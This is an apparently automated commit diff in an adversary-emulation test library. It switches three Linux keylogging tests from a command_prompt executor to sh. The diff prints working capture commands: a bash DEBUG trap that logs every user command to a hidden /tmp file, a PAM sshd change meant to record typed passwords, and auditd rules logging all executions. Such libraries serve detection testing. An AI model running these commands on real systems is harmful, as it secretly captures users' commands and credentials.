Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

atomics/Indexes/Indexes-CSV/index.csv

@@ -37,9 +37,9 @@ credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f1250758
 credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
 credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
-credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
-credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
-credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
+credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
+credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
+credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
 credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
 credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
 credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
@@ -121,9 +121,9 @@ collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2
 collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
 collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
-collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
-collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
-collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
+collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
+collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
+collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
 collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
 collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
 collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -9,9 +9,9 @@ credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,b
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
 credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
-credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
-credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
-credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
+credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
+credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
+credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
 credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
@@ -34,9 +34,9 @@ collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or
 collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
 collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
 collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
-collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
-collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
-collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
+collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
+collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
+collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
 collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
 collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
 collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash

atomics/Indexes/index.yaml

@@ -2853,7 +2853,7 @@ credential-access:
           type: String
           default: "/tmp/.keyboard.log"
       executor:
-        name: command_prompt
+        name: sh
         elevation_required: false
         command: |
           trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
@@ -2889,7 +2889,7 @@ credential-access:
           type: String
           default: ubuntu
       executor:
-        name: command_prompt
+        name: sh
         elevation_required: true
         command: "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so
           disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl
@@ -2917,7 +2917,7 @@ credential-access:
 
 '
       executor:
-        name: command_prompt
+        name: sh
         elevation_required: true
         command: "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl
           -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start
@@ -8762,7 +8762,7 @@ collection:
           type: String
           default: "/tmp/.keyboard.log"
       executor:
-        name: command_prompt
+        name: sh
         elevation_required: false
         command: |
           trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
@@ -8798,7 +8798,7 @@ collection:
           type: String
           default: ubuntu
       executor:
-        name: command_prompt
+        name: sh
         elevation_required: true
         command: "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so
           disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl
@@ -8826,7 +8826,7 @@ collection:
 
 '
       executor:
-        name: command_prompt
+        name: sh
         elevation_required: true
         command: "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl
           -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start

atomics/T1056.001/T1056.001.md

@@ -188,17 +188,17 @@ To gain persistence the command could be added to the users .bashrc or .bash_ali
 | output_file | File to store captured commands | String | /tmp/.keyboard.log|
 
 
-#### Attack Commands: Run with `command_prompt`! 
+#### Attack Commands: Run with `sh`! 
 
 
-```cmd
+```sh
 trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
 echo "Hello World!"
 cat #{output_file}
 ```
 
 #### Cleanup Commands:
-```cmd
+```sh
 rm #{output_file}
 ```
 
@@ -239,10 +239,10 @@ Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The
 | user_account | Basic ssh user account for testing. | String | ubuntu|
 
 
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
 
 
-```cmd
+```sh
 cp -v /etc/pam.d/sshd /tmp/
 echo >> "session required pam_tty_audit.so disable=* enable=* open_only log_passwd"
 systemctl restart sshd
@@ -256,7 +256,7 @@ exit
 ```
 
 #### Cleanup Commands:
-```cmd
+```sh
 cp -fv /tmp/sshd /etc/pam.d/
 ```
 
@@ -293,17 +293,17 @@ The linux audit tool auditd can be used to capture 32 and 64 bit command executi
 
 
 
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
 
 
-```cmd
+```sh
 auditctl -a always,exit -F arch=b64 -S execve -k CMDS 
 auditctl -a always,exit -F arch=b32 -S execve -k CMDS
 whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S")
 ```
 
 #### Cleanup Commands:
-```cmd
+```sh
 systemctl restart auditd
 ```